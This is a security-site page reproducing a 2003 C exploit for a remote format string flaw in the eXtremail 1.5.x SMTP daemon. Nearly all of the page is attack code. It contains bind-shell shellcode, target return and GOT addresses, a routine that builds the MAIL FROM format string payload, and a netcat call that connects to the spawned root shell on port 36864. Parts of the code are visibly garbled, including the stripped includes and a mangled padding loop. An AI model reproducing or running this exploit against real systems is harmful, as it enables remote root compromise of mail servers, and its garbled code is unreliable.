Linux eXtremail 1.5.x Remote Format Strings Exploit

    
 
     * Version TXT Disponible ici *
/****************************************************************/
                              /*          Linux eXtremail 1.5.x Remote Format Strings Exploit                 */
                              /*                                                                                                      */
                              /*                                                      */
                              /*                                     By B-r00t - 02/07/2003                   */
                              /*                                                      */
                              /*      Versions:       Linux eXtremail-1.5-8 => VULNERABLE          */
                              /*                  Linux eXtremail-1.5-5 => VULNERABLE              */
                              /*      Exploit uses format strings bug in fLog() of smtpd to bind a    */
                              /*      r00tshell to port 36864 on the target eXtremail server.         */
                              /*                                                      */
                              /****************************************************************/

                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

                              #define EXPLOIT "eXtreme"
                              #define DEST_PORT 25

                              // Prototypes
                              int get_sock (char *host);
                              int send_sock (char *stuff);
                              int read_sock (void);
                              void usage (void);
                              int do_it (void);

                              // Globals
                              int socketfd, choice;
                              unsigned long GOT, RET;
                              char *myip;
                              char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
                              char shellcode[] = 
                              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                              "\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
                              "\x40\x89\xc3\x89\x46\x0c\x40\x89"
                              "\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
                              "\x80\x43\xc6\x46\x10\x10\x88\x46"
                              "\x08\x31\xc0\x31\xd2\x89\x46\x18"
                              "\xb0\x90\x66\x89\x46\x16\x8d\x4e"
                              "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
                              "\x66\xcd\x80\x89\x5e\x0c\x43\x43"
                              "\xb0\x66\xcd\x80\x89\x56\x0c\x89"
                              "\x56\x10\xb0\x66\x43\xcd\x80\x86"
                              "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
                              "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
                              "\x80\x88\x56\x07\x89\x76\x0c\x87"
                              "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
                              "\xe8\x8d\xff\xff\xff\x2f\x62\x69"
                              "\x6e\x2f\x73\x68";


                              struct {
                              char *systemtype;
                              unsigned long got;
                              unsigned long ret;
                              int pad;
                              int buf;
                              int pos;
                              } targets[] = {
                              // Confirmed targets tested by B-r00t.
                              { "RedHat 7.2 eXtremail V1.5 release 5 
                              (eXtremail-1.5-5.i686.rpm)",   0x0813b19c, 0xbefff1e8, 1, 266, 44},
                              { "Linux ANY eXtremail V1.5 release 5 
                              (eXtremail-1.5-5.tar.gz)",   0x0813b19c, 0xbefff1b8, 1, 266, 44},
                              { "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",   0xbefff0c8, 
                              0xbefff1d4, 1, 266, 44},
                              { "eXtremail V1.5 DEBUG",   0x44434241, 0xaaaaaaaa, 1, 266, 
                              44},
                              { 0 } 
                              };

                              int main ( int argc, char *argv[] )
                              {
                              char *TARGET = "TARGET";

                              printf ("\n%s by B-r00t <>. (c) 2003\n", 
                              EXPLOIT);

                              if (argc < 3) 
                              usage ();

                              choice = atoi(argv[2]);
                              if (choice < 0 || choice > 3) 
                              usage ();

                              setenv (TARGET, argv[1], 1);

                              get_sock(argv[1]);
                              sleep (1);
                              read_sock ();
                              sleep (1);
                              send_sock (helo);
                              sleep (1);
                              read_sock ();
                              sleep(1);
                              do_it ();
                              }


                              void usage (void)
                              {
                              int loop;
                              printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
                              printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
                              for (loop = 0; targets[loop].systemtype; loop++)
                              printf ("\n%d\t%s", loop, targets[loop].systemtype);
                              printf ("\n\nOn success a r00tshell will be spawned on port 
                              36864.\n\n");
                              exit (-1);
                              }


                              int get_sock (char *host) 
                              {
                              struct sockaddr_in dest_addr;

                              if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                              perror("Socket Error!\n");
                              exit (-1);
                              }

                              dest_addr.sin_family = AF_INET;
                              dest_addr.sin_port = htons(DEST_PORT);
                              if (! inet_aton(host, &(dest_addr.sin_addr))) {
                              perror("inet_aton problems\n");
                              exit (-2);
                              }

                              memset( &(dest_addr.sin_zero), '\0', 8);
                              if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct 
                              sockaddr)) == -1){
                              perror("Connect failed!\n");
                              close (socketfd);
                              exit (-3);
                              }
                              printf ("\n\nConnected to %s\n", host);
                              }



                              int send_sock (char *stuff) 
                              {
                              int bytes;
                              bytes = (send (socketfd, stuff, strlen(stuff), 0));
                              if (bytes == -1) {
                              perror("Send error");
                              close (socketfd);
                              exit(4);
                              }
                              printf ("Send:\t%s", stuff);
                              return bytes;
                              }


                              int read_sock (void) 
                              {
                              int bytes;
                              char buffer[200];
                              char *ptr;
                              ptr = buffer;
                              memset (buffer, '\0', sizeof(buffer));
                              bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
                              if (bytes == -1) {
                              perror("send error");
                              close (socketfd);
                              exit(4);
                              }
                              printf ("Recv:\t%s", buffer);
                              return bytes;
                              }


                              int do_it (void)
                              {
                              char format[200], buf[500], *bufptr, *p;
                              int loop, sofar = 0;
                              int PAD = targets[choice].pad;
                              int POS = targets[choice].pos;
                              unsigned char r[3], g[3], w[3];

                              RET = targets[choice].ret;
                              r[0] = (int) (RET & 0x000000ff);
                              r[1] = (int)((RET & 0x0000ff00) >> 8);
                              r[2] = (int)((RET & 0x00ff0000) >> 16);
                              r[3] = (int)((RET & 0xff000000) >> 24);

                              GOT = targets[choice].got;
                              g[0] = (int) (GOT & 0x000000ff);
                              g[1] = (int)((GOT & 0x0000ff00) >> 8);
                              g[2] = (int)((GOT & 0x00ff0000) >> 16);
                              g[3] = (int)((GOT & 0xff000000) >> 24);


                              // Start buf
                              bufptr = buf;
                              bzero (bufptr, sizeof(buf));
                              strncpy (buf, "mail from: ", strlen("mail from: "));
                              sofar = 19;

                              // Do padding
                              for (loop=0; loop sofar) {
                                                w[loop] = r[loop]-sofar;
                                                } else
                              if (r[loop] == sofar) {
                                                w[loop] = 0;
                                                }else
                              if (r[loop] < sofar) {
                                                w[loop] = (256-sofar)+r[loop];
                                                }
                              sofar = sofar+w[loop];
                              }

                              bufptr = format;
                              bzero (bufptr, sizeof(format));
                              sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n", 
                              w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
                              strncat (buf, format, sizeof(format));
                              strncat (buf, shellcode, sizeof(shellcode));

                              // Summarise
                              printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
                              printf ("\nWrite Addy:\t\t0x%x", GOT);
                              printf ("\nRET (shellcode):\t0x%x", RET);
                              printf ("\nPAD (alignment):\t%d", PAD);
                              printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf), 
                              targets[choice].buf);
                              printf ("\nSending it ... \n");
                              sleep(1);

                              // Ok lets Wack it!
                              send_sock (buf);
                              sleep (1);
                              close (socketfd);
                              printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 
                              ....!!!!!\n\n\n");
                              sleep(3); // May take time to spawn a shell
                              system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
                              exit (0);
                              }
                              

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits